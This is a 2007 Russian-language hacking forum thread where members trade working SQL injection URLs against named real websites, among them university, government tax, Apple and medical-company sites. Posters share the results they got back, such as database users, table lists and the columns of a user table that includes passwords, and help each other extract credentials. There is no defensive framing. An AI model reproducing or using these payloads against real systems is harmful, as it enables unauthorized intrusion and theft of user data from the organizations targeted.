 |
|
09.07.2007, 21:27
|
|
Познающий
Регистрация: 06.06.2007
Сообщений: 83
С нами:
9963383
Репутация:
140
|
|
Таблицы не подобрал 
Код:
http://asun.unl.edu/page.php?page_id=1+union+select+1,2,3/*
|
|
|
09.07.2007, 21:50
|
|
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами:
10248806
Репутация:
2371
|
|
Y.Dmitriy, limit поюзай и все будет открываться
[code]http://transport.su/news.php?rub=6&id=23212+union+select+1,2,3,4,5,6,7 ,login,9,10+from+users+limit+2,1/*[code]
|
|
|
|
09.07.2007, 23:03
|
|
Познающий
Регистрация: 06.06.2007
Сообщений: 83
С нами:
9963383
Репутация:
140
|
|
Код:
http://kipelov.ru/ly.php?idtxt=-1+union+select+2,3,4/*
 ) |
|
|
|
10.07.2007, 00:46
|
|
Познающий
Регистрация: 19.03.2006
Сообщений: 37
С нами:
10602901
Репутация:
11
|
|
Сайтег Гарварда...
Код:
http://www.law.harvard.edu/faculty/directory/facdir.php?id=20+union+select+user(),database()/*
facdir@localhost: academics
Последний раз редактировалось anakreon; 10.07.2007 в 01:15..
|
|
|
|
10.07.2007, 15:57
|
|
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
С нами:
10084646
Репутация:
161
|
|
САЙТ ГОСУДАРСТВЕННОЙ НАЛОГОВОЙ АДМИНИСТРАЦИИ УКРАИНЫ
!!!!СЦУКО НЕНАВИЖУ!!!
http://www.sta.gov.ua/basa1/data.php3?reason=access&sess=&rub=-1+union+select+1,user(),3,4/*
|
|
|
|
10.07.2007, 17:53
|
|
Участник форума
Регистрация: 22.01.2007
Сообщений: 218
С нами:
10157802
Репутация:
156
|
|
Сообщение от Y.Dmitriy
САЙТ ГОСУДАРСТВЕННОЙ НАЛОГОВОЙ АДМИНИСТРАЦИИ УКРАИНЫ
!!!!СЦУКО НЕНАВИЖУ!!!
Ещё бы пасс.
Супер
|
|
|
|
10.07.2007, 20:50
|
|
Постоянный
Регистрация: 05.01.2007
Сообщений: 508
С нами:
10182506
Репутация:
1393
|
|
Сообщение от Shram-spb
Таблицы не подобрал
Код:
http://asun.unl.edu/page.php?page_id=1+union+select+1,2,3/*
http://asun.unl.edu/page.php?page_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,1 4,15/*
вот подобрал колонки!
Последний раз редактировалось z01b; 10.07.2007 в 20:55..
|
|
|
|
10.07.2007, 21:37
|
|
Познающий
Регистрация: 06.06.2007
Сообщений: 83
С нами:
9963383
Репутация:
140
|
|
http://stumpage.uvm.edu/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12 +from+information_schema.columns/*/
|
|
|
|
11.07.2007, 06:11
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
С нами:
12513535
Репутация:
187
|
|
http://edcommunity.apple.com/ali/news_feed.php?itemID=9449'+order+by+9/*
http://edcommunity.apple.com/ali/item.php?itemID=11767'+union+select+1/*
P.S.:
как можно обойти это:
Код:
http://edcommunity.apple.com/ali/search.php?collectionID=1234&order=1+union+select+1,2/*
|
|
|
|
11.07.2007, 08:58
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
С нами:
12513535
Репутация:
187
|
|
MsSql:
http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=@@versi on--
http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(select +db_name())--
http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(select +system_user)--
Таблицы:
D99_Tmp
Category
D99_CMD
Dic_BodyPart
Dic_HX
Dic_Language
Dic_State
Dic_Test
dtproperties
ip
Message
Rights
Role
SessionAction
SessionLog
Siwebtmp
Subscriber
sysconstraints
syssegments
systables
User
v_Category
v_Rights
v_SessionActions
Нашел все колонки в таблице User:
ID
RoleRef
System
Name
Password
FirstName
LastName
EMail
Не получилось последнее:
Код:
http://www.raytelmedcorp.com/Content.asp?CategoryID=0&CurrentID=17+or+1=(SELECT+TOP+1+Name+from+User+where+ID=3)--
Как реализовать?
Последний раз редактировалось Dr.Frank; 11.07.2007 в 09:09..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
